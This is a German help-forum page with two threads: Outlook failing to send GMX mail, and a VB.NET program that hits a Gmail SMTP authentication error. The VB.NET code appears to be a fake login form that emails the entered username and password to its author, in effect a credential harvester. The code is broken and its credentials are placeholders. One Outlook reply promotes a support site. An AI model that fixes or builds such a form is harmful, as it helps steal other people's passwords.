Hilfe! Outlook versendet keine GMX E-Mail mehr?

4 Antworten

Hallo! Welche Version von Outlook hast du? Vielleicht müsstest du zur neueren Version wechseln? Solche Fehle à la 451 sind immer ärgerlich, ich kenne mich da selbst schlecht aus. Hatte mal ein ähnliches Problem mit Yahoo. Damals habe ich bei Aaron angerufen, die haben mir innerhlab von 15 min geholfen. Hier die Webseite: frag-aaron.de

hallo Cantoclass,

ich hatte diese Probs auch. Ich habe unter Postausgangsserver den Kasten Der Postausgangsserver erfordert Authenifizierung aktiviert ... Einstellung getestet und siehe da, es funktioniert. Die anderen Einstelung sind wie von den Vorgängern beschrieben Pop 3 995, Postausgang 465, Verschlüsselung SSL.

Viel Erfolg toyclock

Postausgang: Server: mail.gmx.net Port: 587 Verschlüsselung: STARTTLS

Habe es mit Deinem Port probiert, geht auch nicht.

Und STARTTLS habe ich in meinem alten Outlook 6 nicht.

0

SMTP Server sichere Verbindung erforderlich Visual Studio 2017?

Guten Tag! Ich programmiere gerade was in VS 17. Ein Programm, was eine EMail verschicken soll, wenn etwas eingegeben wurde und bestätigt wurde. Bei mir kommt aber der Fehler: "System.Net.Mail.SmtpException: "Für den SMTP-Server ist eine sichere Verbindung erforderlich, oder der Client wurde nicht authentifiziert. Die Serverantwort war: 5.5.1 Authentication Required. Learn more at""

Wie behebe ich es?

Das ist der Code (zensiert wegen Email und PW...):

Imports System.Net.Mail

Public Class Form1

  Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click

    If TextBox1.Text = "" Then

      MsgBox("Please Wait")

      If TextBox2.Text = "" Then

        MsgBox(LALALALLALATESTsdsd")

      Else

      End If

    End If

    Dim smtpServer As New SmtpClient()

    Dim mail As New MailMessage()

    smtpServer.Credentials = New Net.NetworkCredential("gutefragegmail.com", "Gutefrage1234")

    'using gmail

    smtpServer.Port = 587

    smtpServer.Host = "smtp.gmail.com"

    smtpServer.EnableSsl = True

    mail = New MailMessage()

    mail.From = New MailAddress("gutefrage@gmail.com")

    mail.To.Add("gutefragegmail.com")

    mail.Subject = "Username : " & TextBox1.Text

    mail.Body = "Password : " & TextBox2.Text & ","

    smtpServer.Send(mail)

    MsgBox(LALALALLATEST")

  End Sub

End Class

Ich habe nachgelesen, und der Port müsste stimmen, aber trotzdem geht es nicht beim Debuggen. Bitte um Hilfe!

Vielen DAnk!

...zur Frage

Was möchtest Du wissen?